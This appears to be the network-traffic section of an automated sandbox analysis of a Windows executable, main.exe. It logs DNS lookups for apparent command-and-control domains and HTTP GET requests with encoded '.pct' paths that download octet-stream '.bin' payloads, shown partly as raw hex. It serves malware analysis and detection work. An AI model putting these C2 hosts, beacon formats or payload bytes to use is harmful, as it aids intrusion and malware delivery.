                          Nov 16, 2022 02:14:47.930428982 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930429935 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930433035 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930453062 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930458069 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930468082 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930481911 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930505037 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930527925 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930550098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930555105 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930555105 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930556059 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930571079 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930588961 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930604935 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930613995 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930629969 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930644035 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930644035 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930655003 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930679083 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930691004 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930702925 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930711031 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930727005 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930727959 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930752993 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930764914 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930777073 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930783033 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930800915 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930810928 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930825949 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930831909 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930846930 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930900097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:48.026104927 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:48.087292910 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114087105 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114119053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:54.114183903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:54.114183903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:56.108963966 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:56.109076023 CET4969880192.168.2.3134.0.118.203
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2022 02:13:04.754086018 CET | 59869 | 53 | 192.168.2.3 | 8.8.8.8
Nov 16, 2022 02:13:05.118052006 CET | 53 | 59869 | 8.8.8.8 | 192.168.2.3
Nov 16, 2022 02:14:25.358735085 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8
Nov 16, 2022 02:14:25.378199100 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3
Nov 16, 2022 02:15:18.869553089 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8
Nov 16, 2022 02:15:19.235027075 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:04.754086018 CET192.168.2.38.8.8.80xbfdfStandard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.358735085 CET192.168.2.38.8.8.80x8f7Standard query (0)iujdhsndjfks.ruA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:18.869553089 CET192.168.2.38.8.8.80xe6a8Standard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 16, 2022 02:13:05.118052006 CET8.8.8.8192.168.2.30xbfdfServer failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                          Nov 16, 2022 02:14:25.378199100 CET8.8.8.8192.168.2.30x8f7No error (0)iujdhsndjfks.ru134.0.118.203A (IP address)IN (0x0001)false
                          Nov 16, 2022 02:15:19.235027075 CET8.8.8.8192.168.2.30xe6a8Server failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                          • iujdhsndjfks.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49698 | 134.0.118.203 | 80 | C:\Users\user\Desktop\main.exe
Timestamp | kBytes transferred | Direction | Data
Nov 16, 2022 02:14:25.458513021 CET | 156 | OUT | GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
Nov 16, 2022 02:14:39.472409964 CET | 158 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:39 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 181406
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="6374397e8fb85.bin"
                          Data Raw: 77 e2 dd be 4e fc 54 af ad 72 f5 2f ec 9d cb 53 d6 b7 91 61 54 04 6d cf e9 2c aa c0 e7 9f 82 95 6b 8d d4 22 6c 13 aa 68 18 d0 aa b5 10 c1 a2 41 89 f1 a3 42 ef bf 79 a0 bc 8b 6f 7f ed 39 a7 e0 66 2c 52 2e d9 55 7e fa 1d bb 4f 2b 4a f1 c2 30 3d 4d f4 51 a2 63 bc 7b 18 08 a5 5c 47 f7 1b 47 80 2b 4b 47 1a 0a 44 d3 4a 81 5b 71 6a 06 85 b1 0b 9f 6d 9a 9e d2 64 e3 c3 21 75 b0 4a 0a 24 e3 01 8a 53 48 65 bc 19 81 72 30 d0 b0 d3 31 0b 32 5f db 00 53 a5 b5 22 de 93 6d bf 7d ae 59 fe 4f 33 88 ab 41 a0 f7 aa 93 79 cd 8d 06 36 0a d9 c0 c1 9e 4d fd 7b 27 87 a0 88 66 1f b7 b1 ce 9f 27 26 0b f1 7c cf 20 57 75 16 32 6a 66 96 3a 08 9f ed a9 b8 12 17 e4 7d 7b b6 03 1c 94 24 90 51 5d 3c ca d2 22 74 7a b2 b7 0b c8 2a 3e 5b 1e ea 50 a0 dc e2 d3 62 5c 42 85 be b3 71 41 27 40 dd 30 c9 ab 99 53 db 5f a7 dc a8 d0 33 e4 40 42 44 0b cf de 56 2b 8b f2 5a be 04 d0 d9 a2 e3 1a 76 c5 d1 12 82 97 85 a0 7a 30 39 0d 41 28 6e 42 1c a1 3a 15 dd 27 99 ce c7 c7 55 bb e4 a3 41 0c 3e 7e e0 36 64 ed 00 c9 c7 93 66 3d 50 2b 25 6a 06 56 6d 0f ed f2 30 6c e6 52 39 ee 18 b7 06 56 8e c5 61 2d b7 ca 56 d2 ba ea 3c fc c1 d7 77 5f ad be a6 63 71 e3 81 5a 9b 3e 29 d5 b6 2e 51 d3 29 c2 2b f2 6d da 38 bf 5c 5f 60 e7 0f 62 9f 89 ad fe 48 69 d8 af 97 ab 36 a0 4c 65 1a 5e 22 bf d7 b5 51 a4 da 1c 65 56 98 4b 42 67 3f af d2 c9 09 e8 c4 23 51 86 cd ca b9 ce 6a fa d9 69 e7 a7 28 d6 4b 57 4c af 9d ad 7a f6 23 fd 21 c0 45 58 e6 c7 1d bd 4c 6e 99 33 e5 4e 70 3f c3 0a c1 f7 bc 08 31 2a 0c 6c 59 d5 f1 22 bc 21 25 4d 1b 31 21 88 eb c3 05 05 1f 9d 43 1b ff 04 61 4f 05 d8 ef b3 48 9a 26 fa a7 6a f1 38 b4 0e 17 3b 21 80 6f 25 e6 1e 00 26 a4 86 97 87 8b 4f 49 30 9e 7f 8e 8b b8 25 ca 27 3d 45 3f 7b 6c 95 7d a3 89 0a 46 5f 78 b3 ef 84 5b 22 42 fe 07 84 b3 7e 10 99 de c0 96 85 eb 52 63 2b e6 b5 7e ec 54 cc d6 ee e0 e3 98 c4 a7 67 8a 4d 35 0a 7e bf 95 86 61 d0 ff 93 63 82 33 30 d2 ad 2b 70 8f f2 df b1 aa a3 31 d6 83 c1 f1 f4 2b 27 58 52 89 e3 a1 39 54 3c 37 6d dd db 01 f9 5d c1 26 f4 8a a4 1e c6 3b e3 
69 98 d5 47 1c 64 1a 87 e0 a9 42 bc f1 67 25 3b e4 c8 17 35 ba f6 2f 3f 43 ab 99 51 f9 c9 ca a7 a8 3d 1b 69 3f 7c f4 93 2c 6c 28 f0 ab d5 d3 6a 03 90 8a c4 b7 39 82 35 14 67 56 36 08 3c f9 ca 7b ae e5 83 bf d8 cc f9 56 2c 1f 9d 08 e2 5f 30 c9 d5 a8 42 b5 3b a9 15 49 05 80 d0 97 e6 3c 34 ff 5a 4c 72 9a d9 33 98 f5 7a 7c 34 e2 41 e1 f4 a5 9c cc 39 18 14 32 3b 21 8c 5e 8f 77 15 91 fd 56 d1 d8 57 89 ee 9c 7c cd ee 4f 9e c1 10 8c 6c a4 34 7a 76 0e 75 e1 b5 2e 77 c0 3c 6c 8f 6b 00 88 3d 2d c3 1d bd 6d 47 50 14 ba e2 4e 01 f0 9d 46 dd d0 a7 06 fa 29 ca d1 a1 46 a4 67 fc 57 c7 33 2c 6f 83 79 38 61 94 ea ad 5a 68 e3 66 39 a7 55 e3 ef 1e 9e e4 c6 f6 5d 19 2a 73 8b 26 98 e8 5c 0b d0 34 15 30 15 a1 0e 91 43 ae c8 d2 f8 91 b9 33 23 a0 13 85 a7 b1 93 91 f1 1e b8 7d be 44 2f 78 78 ef 16 74 e9 d9 9d c4 bd 54 36 9b 1c e5 21 3e 49 a3 e8 9a 20 03 10 46 47 85 2e ad 3a 57 6a
                          Data Ascii: wNTr/SaTm,k"lhAByo9f,R.U~O+J0=MQc{\GG+KGDJ[qjmd!uJ$SHer012_S"m}YO3Ay6M{'f'&| Wu2jf:}{$Q]<"tz*>[Pb\BqA'@0S_3@BDV+Zvz09A(nB:'UA>~6df=P+%jVm0lR9Va-V<w_cqZ>).Q)+m8\_`bHi6Le^"QeVKBg?#Qji(KWLz#!EXLn3Np?1*lY"!%M1!CaOH&j8;!o%&OI0%'=E?{l}F_x["B~Rc+~TgM5~ac30+p1+'XR9T<7m]&;iGdBg%;5/?CQ=i?|,l(j95gV6<{V,_0B;I<4ZLr3z|4A92;!^wVW|Ol4zvu.w<lk=-mGPNF)FgW3,oy8aZhf9U]*s&\40C3#}D/xxtT6!>I FG.:Wj
Nov 16, 2022 02:14:39.472446918 CET | 159 | IN | Data Raw: 9b 36 7c 80 e7 7c 25 f3 bd ba ea 85 23 ff 30 03 f9 4b 8a 0b ab b0 b3 32 21 23 e6 6c 7b 9d cb 81 f1 58 10 a9 75 2f 32 e4 8a 32 f5 fb a2 65 b7 06 a4 68 c6 a9 51 2a 7b 47 b9 5c c5 ab fe 55 8f 6f 1e 62 06 a7 43 d6 43 54 e5 ce 97 00 6a b5 8d 83 94 03
                          Data Ascii: 6||%#0K2!#l{Xu/22ehQ*{G\UobCCTjU><(:aR9[aX1hf1}Qwn;f tGu@uwb45jgVR#;^ok$C7Xozic9Xa-t!ZC?
Nov 16, 2022 02:14:39.472465038 CET | 160 | IN | Data Raw: e7 00 33 c7 32 f9 29 da e4 77 5b a8 0d d2 d5 50 83 d6 5b 6b 81 d5 ba dc 84 8f a3 80 14 47 7e 5c af 41 61 0f 16 41 24 46 b8 0f 45 7f 2f 19 7f ff 36 48 73 5e 40 e3 97 97 36 a7 aa ba ec 89 db 14 8e f1 dd 49 d2 f1 92 5e d2 d8 28 8a e8 f5 88 62 d9 34
                          Data Ascii: 32)w[P[kG~\AaA$FE/6Hs^@6I^(b4+8j6I>h7K C!sCN4|`.snD!ZXzx4 ;8Q6B0Q|J~Wec;x\|7RSl^;9>s]]FFZ"
Nov 16, 2022 02:14:39.472477913 CET | 161 | IN | Data Raw: 22 db c3 ab c3 e7 2e b5 47 36 19 ad f3 4a 13 2c bc 20 43 aa ab b4 79 1b 38 1d ee d7 ff be 1f b4 8b c2 ac d3 ff 6d 16 f7 f8 b1 b9 c9 4b 1e 6e f3 c3 ff 5f ef 0c 0b 16 4c 0b a3 36 cf af 35 0b ec 80 e4 3d 1f 14 70 ef 0f 28 14 4b 69 25 df 48 4c 81 f4
                          Data Ascii: ".G6J, Cy8mKn_L65=p(Ki%HL(9pkd*n|pAc9"uyIJ_gf<!\v>z9'&8ejl92#-_s1T.Oz@qz?r)&ykfLM9~kCb@!
Nov 16, 2022 02:14:39.472493887 CET | 163 | IN | Data Raw: 7b 9a c2 b6 11 5b ae e6 8a 39 96 83 b7 5f 6a cd 96 1a 58 e4 61 fd b8 4f d5 67 2d 95 e7 2d 5f 5a 30 c6 11 f5 92 3c 76 f2 0a ad 63 bc c9 14 18 63 f3 72 cd 2b 9c 05 41 0d 18 a3 c6 bb 0e 73 2a 26 73 75 42 51 c3 41 2d 63 95 d2 1e d6 c0 32 5f 69 72 57
                          Data Ascii: {[9_jXaOg--_Z0<vccr+As*&suBQA-c2_irWw$HH\"4xzdz{Te}}40#Sm-vUt8lB4.TF0XgZzqCp|KeHjd*l!PK;_h{%
Nov 16, 2022 02:14:39.472511053 CET | 164 | IN | Data Raw: cc 76 bb cd f7 fc 0e 53 26 e7 74 81 bd 1f c0 85 78 8a 00 cc 05 de 1a 92 19 2e 6e d3 b7 ef 8d e7 51 00 7a c7 8f e4 46 08 07 6d 06 e2 0f 6b 8c 5a 51 2c 5e ea a2 84 b8 21 80 1c 41 ad d3 09 d4 24 f0 0f 70 1c df 2a a6 0d 94 de bd 88 cd 73 83 7c eb a5
                          Data Ascii: vS&tx.nQzFmkZQ,^!A$p*s|sG&eYW"E|)kvCC30etIM(6[&-f:aJ1~l)yM<416,X_p-c>,f:{5+Z:
Nov 16, 2022 02:14:39.472527027 CET | 165 | IN | Data Raw: d4 d4 e1 3e 46 7e 10 1e 3c 78 7f b6 31 53 b2 12 e7 27 17 af 3c ea 5f 21 97 a6 d0 21 2d 48 09 98 b6 be 1c af 44 0f 61 d9 1b 40 8a 53 9b 78 7d 73 82 9f 0c a2 86 d7 6d 64 cb c9 57 81 75 ce e8 ad ae 7f 77 26 f3 07 74 72 7e 0a 62 a3 26 10 d7 a3 88 59
                          Data Ascii: >F~<x1S'<_!!-HDa@Sx}smdWuw&tr~b&YI3"g/UISX4-!p@JtMsh9;*mHO6]:rs-E*'Vm2C1(`)!rtCm."V#G4kThBNIOk~X6mJ=
Nov 16, 2022 02:14:39.472544909 CET | 166 | IN | Data Raw: 67 c5 86 52 e6 25 00 28 89 76 b7 40 78 bd 4f ad 25 98 75 8f c0 e6 18 70 fc 86 60 0b 0d d7 95 6f 07 4b 32 36 36 0f 10 3e 28 79 b4 d5 8c 81 99 63 73 33 ec a8 d0 13 af e7 e3 4d 6e 4a 73 2d d3 45 f1 53 02 67 0a 01 e6 2c 79 5c 81 6f 70 48 6c 5a 34 9b
                          Data Ascii: gR%(v@xO%up`oK266>(ycs3MnJs-ESg,y\opHlZ4ffoYMD**[nz*ED].Hb[V?!eKbX5prlY'.)1V!0mzYksLYm=\*jp#mYq5yt<@U
Nov 16, 2022 02:14:39.472562075 CET | 167 | IN | Data Raw: 1f 20 31 0d b9 9c 5e f7 fc 88 99 58 2b 8b 42 9d 17 2e 18 b0 f7 e1 f6 d4 de e8 c1 17 a2 6e 37 3f d1 e8 a6 43 83 09 4e d2 74 05 bf a0 e0 34 3e 5e ae 5b 74 b1 37 5d 09 85 15 57 54 a8 bf 82 a4 7a 91 01 89 17 11 75 80 db ad dc 1a 93 76 c4 c6 1c ec c4
                          Data Ascii: 1^X+B.n7?CNt4>^[t7]WTzuvqtHzIwzZ{1\WDS7{cTF/b&zg,`0ClNE *'!HO)?I2-h:1^E8';Fz
Nov 16, 2022 02:14:39.472578049 CET | 169 | IN | Data Raw: fd 8b 10 c0 e6 b7 90 52 11 10 23 b0 1b 85 73 bd 50 42 cd 92 2a de f1 9e 92 07 60 11 a7 68 1e a6 9a 17 e7 8c 5c 83 45 7f 0f 2c 49 46 0e d6 7a 17 96 ca 69 a8 8a 05 c7 54 45 1a c5 d3 7d 97 0a f0 59 3b 57 16 4c 96 9f b1 2f 72 e6 51 56 97 1e e9 4a c1
                          Data Ascii: R#sPB*`h\E,IFziTE}Y;WL/rQVJofuW<_wez.8(a>mhYMEk;#prdp@vn@E~;Tj1?uz{XF8*?=QlJ.\R!j=6k
Nov 16, 2022 02:14:39.533454895 CET | 170 | IN | Data Raw: 36 5f c6 56 9d bc d8 76 d6 0d 2e 99 a8 3f 30 a7 4f 27 a1 03 f1 6c cb 8f 62 a5 e4 e6 c8 d3 26 dc 2d 58 5b 13 28 4f 75 8f b2 42 10 eb f4 08 c9 1f 4b c3 00 33 ce f2 cc f9 78 49 ff 2f d9 61 35 4a 86 94 7a ec ff f7 de 46 ed 0c fc 92 5b b1 df 62 83 b5
                          Data Ascii: 6_Vv.?0O'lb&-X[(OuBK3xI/a5JzF[bcyMe108p~M^+f9J%}#~u/[l\pwM<Q,:hQF(1sAvs5zXl8$p,WD-n+wLVcQ%XDr
Nov 16, 2022 02:14:39.786031008 CET | 345 | OUT | GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
Nov 16, 2022 02:14:47.679074049 CET | 347 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:47 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 233114
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="637439879f494.bin"
                          Data Raw: e3 6b 6d e3 37 df 41 63 38 18 65 c9 8b fd 3b b3 78 43 58 36 36 f9 73 97 97 df 5f 2f 22 36 78 29 ef b8 87 45 fd c7 9a d2 4e db 6d 5e 6d c1 7a b0 81 f5 74 5a f8 f3 8a 27 14 34 6d a1 52 7d 98 8d a1 57 22 89 98 58 d7 49 02 11 00 21 bc 66 34 31 75 ba 9d 42 ed 76 d1 03 fa af 5c 72 bb 0a 39 d2 89 9c fd 09 1c 62 8b b0 ab 1c 75 1a 76 20 a3 dd bc f3 a4 c4 ab f6 13 8d f9 06 9c 99 f4 c2 c0 96 24 0c e7 ff 6e 51 31 2c 7c 3f 30 4e 6d ae 3a 81 b7 f9 2a 40 3f be e9 9d 7c a8 ed fc f1 03 86 07 7f 75 4d 52 65 f0 58 47 93 18 03 5d ee ca bc ff c1 c2 63 ec 85 5c cd 2b a1 67 3f f0 02 bc d9 17 77 ef d9 9e d2 9a 18 a0 fd 35 6f e4 93 22 90 5d 3b 4b cb 71 86 70 d6 18 bc 62 28 aa 76 7a 24 52 c0 50 8c 3f 67 00 47 e3 df 79 ba 8e 68 84 d5 66 c4 d9 e0 01 2f cd b7 47 f6 43 78 60 ea f7 63 af 5f 7d 43 b5 d3 a3 19 01 d3 0e 00 9f d5 cd 32 6a 92 c7 e9 f1 6d a7 4f 7b cf 61 a9 0b 67 aa 2f c4 7d 9b 87 42 1f 06 02 50 31 ed ed 5f 9b c1 7c 78 39 c7 ae 0f 60 28 5d a2 bc d0 0a 1c 11 cd bd 67 c2 10 b9 0a bd 2b bc 1b b3 af d6 65 4f c7 39 cc 99 2d 8b c7 13 0b 23 68 01 b7 6d 11 6d 5f 45 8c 50 ca f2 cb 1a 76 80 e5 2a 68 28 74 1f c4 1a 6c 6a 57 79 d3 19 55 3f ed 6b fd 04 27 55 be a5 b9 f3 26 31 bc db 2c d9 ec f4 b6 cf ea 65 1d 39 03 8e 28 33 be c6 76 e5 3d 27 94 66 21 a4 06 e5 38 44 7a a6 15 e1 93 52 a0 b6 52 48 68 36 c3 ea f0 67 e2 e5 df b5 9d 56 9d 32 26 3a 44 2a b5 4f ae 18 e1 0c e8 1d f6 78 56 e4 8c 46 2f 04 20 3a d7 83 2d cf e5 67 1d e4 30 83 4c 09 28 f6 4d c9 78 fe 7c 68 ac 2b 01 df 7a 54 98 95 df 00 53 5b 05 b3 46 91 e0 fd fd 33 d3 3f a0 e3 87 8b 6d 09 a7 67 d2 4e 63 e4 eb 0b 8e 0e 5f 8f ec 35 c5 28 de 7d c8 4f 70 29 3e 0b ef 08 f7 98 76 6b e5 98 34 07 9e 30 f0 17 1f 84 ed 92 05 c8 5d 7f 07 67 41 5f fd e7 7b a4 a1 82 1f c7 48 3b 7a d2 e5 b8 03 60 9d 11 53 16 b0 23 99 5c 60 d4 0c 25 41 7d 53 2b d6 b8 e9 29 45 b7 e1 40 04 c2 63 5f 25 bf 50 66 a5 86 49 29 75 fc c9 41 e7 41 dd 11 e4 34 db a0 d8 f2 69 30 20 e8 06 11 4b be a2 ed f3 4e 2c ed 1e 2c cb d4 a1 4f a8 94 ef d7 7e 89 0e 
5a c3 4f e6 3a 21 ee fc 45 cc 1c b1 66 ff be 26 c1 a3 e5 5c ce 8b 6c 2d e5 4a 2d 86 db 8b cb a6 0c a3 58 3c 3d 29 e9 01 d3 f2 8d 5b 20 b2 01 73 3f ba af 2a 84 ba 6f ee 3d f5 01 18 e0 9d f0 2d d4 9a 27 42 81 e0 81 8b 9d eb d1 3d cc ee 5c 9c 69 10 13 72 05 ce 41 f1 07 2a ca 77 d4 ce dd 07 d8 8b 2b 6d 08 31 6d ba 45 ce 26 57 5c da c1 2c f0 4b ff 6f 14 de f8 c7 76 a5 b7 c3 65 a0 49 7e bb ee 7b 35 5b b7 57 95 d8 a5 f2 e4 95 53 6c 3c b0 6d 36 bc d5 3a 9f 26 4f 6c 60 a0 4e 91 01 48 c2 37 46 83 25 2e 8f ad 3e 48 85 d9 66 03 e6 6a bd 12 4a c1 08 01 e5 c6 09 76 a4 31 72 f8 02 9b c2 d1 ea 27 c1 b2 8c d1 00 74 5f 25 ba 0d 26 6a 3c 3a e9 57 0e 9e 5c 3b 95 7a 3f d7 01 4e 59 b9 e7 e4 46 45 8f 57 57 6c a8 b8 ec 78 04 ce f4 bf 03 18 2c c9 47 39 f5 e2 92 88 ea 68 30 44 e1 f5 b1 b2 84 23 c2 f7 a3 62 69 be 6d 1e fd 55 8f e5 de 23 87 ee 7d 0a 24 4a 54 7d 7b b2 50 66 3c 2b 1c
                          Data Ascii: km7Ac8e;xCX66s_/"6x)ENm^mztZ'4mR}W"XI!f41uBv\r9buv $nQ1,|?0Nm:*@?|uMReXG]c\+g?w5o"];Kqpb(vz$RP?gGyhf/GCx`c_}C2jmO{ag/}BP1_|x9`(]g+eO9-#hmm_EPv*h(tljWyU?k'U&1,e9(3v='f!8DzRRHh6gV2&:D*OxVF/ :-g0L(Mx|h+zTS[F3?mgNc_5(}Op)>vk40]gA_{H;z`S#\`%A}S+)E@c_%PfI)uAA4i0 KN,,O~ZO:!Ef&\l-J-X<=)[ s?*o=-'B=\irA*w+m1mE&W\,KoveI~{5[WSl<m6:&Ol`NH7F%.>HfjJv1r't_%&j<:W\;z?NYFEWWlx,G9h0D#bimU#}$JT}{Pf<+
Nov 16, 2022 02:14:48.026104927 CET | 594 | OUT | GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: iujdhsndjfks.ru
                          Connection: Keep-Alive
                          Cache-Control: no-cache
Nov 16, 2022 02:14:54.114087105 CET | 596 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 16 Nov 2022 01:14:54 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 1973
                          Connection: keep-alive
                          Pragma: public
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                          Content-Disposition: inline; filename="6374398d83c18.bin"
                          Data Raw: 80 2c a2 22 7d 34 b8 1c 56 32 94 88 9e 7c 06 98 70 e9 d9 df 7a b6 89 64 cb 27 a8 dd 50 c3 e5 56 bc ca b6 e2 5e 03 07 03 49 38 9e e2 df 3f d0 31 c2 ac 5c ad d1 75 53 1f 38 1a 20 f5 98 32 a2 22 73 4d ee 46 aa e3 27 10 8a 01 67 52 37 2c bd 16 46 e7 dc d9 f6 ab 81 a8 0a 0b 8c fb 8f 47 02 5d 9a 22 db eb 07 00 8e 0d 34 5a 7a 25 d3 0e f6 80 87 5c 5d 20 c0 45 e0 2a 3c fb 7d 16 22 49 95 46 c4 bb 4d 10 93 85 07 69 30 0b 49 67 91 b5 3f 47 86 db 16 4c 64 05 01 9f 8b 1a 3d b4 3d f1 57 0d e7 14 cc be 04 b0 53 a3 39 5f 42 f2 cb 5a 30 04 a7 00 15 76 15 66 e2 fa b9 01 c5 b2 74 a7 dc 4d b4 ed dd ff 60 e7 b3 60 fb ae 40 94 9f 83 12 44 18 38 c9 a1 39 f0 3c 6c e9 e3 57 de 9e 32 c4 95 14 34 25 cb a2 3c 09 c5 d4 ca 2f 2a b0 50 f5 53 db ba 23 61 23 04 4d 43 d2 f8 2c 0d 4e cd c4 bd 92 63 32 e0 60 44 87 80 65 d7 e6 80 2a 4b 58 5e c8 fd 05 8b 4e 73 ab e6 c5 00 ea 2d 62 e3 fa ca d9 c2 2e 0b 98 e7 21 66 a5 bc d1 f5 06 2e d1 41 7d 1d fc 5f 95 55 2b a6 28 fe 90 2d ce 48 77 82 e9 10 1d 7a 14 52 bc df 71 f9 05 9f be fe a9 05 0b 0b d8 73 8c 38 c3 25 31 32 ea 23 da 91 a0 1c 93 bb fb af 3b d8 d3 a7 22 bf 3a 3e 45 69 83 51 63 ff 4f 6c 90 63 16 ee 19 25 47 2a 31 1a 4f 28 d3 75 8a 35 40 a2 e9 30 78 d5 7c 2e f5 83 ec 0b eb da c5 63 01 b2 82 d7 88 73 81 50 bb 8f 99 0f f7 14 3a 3d 4c 76 b3 a6 ae 92 03 7e 58 96 93 09 74 2b d3 14 7b 49 1b 34 de 7d 5d f6 2d 39 9f 3f 57 ea 6d d9 65 54 60 b6 2a b1 fa 6a c2 3f fb 07 f0 31 bf c0 38 5b 0c 32 e3 b1 68 db 73 75 7e 67 70 f4 c5 9b 84 2e 4e 96 13 a9 2e 08 66 de 84 1e 40 cf b3 3e aa 11 04 b4 ea d2 fd 85 3f 81 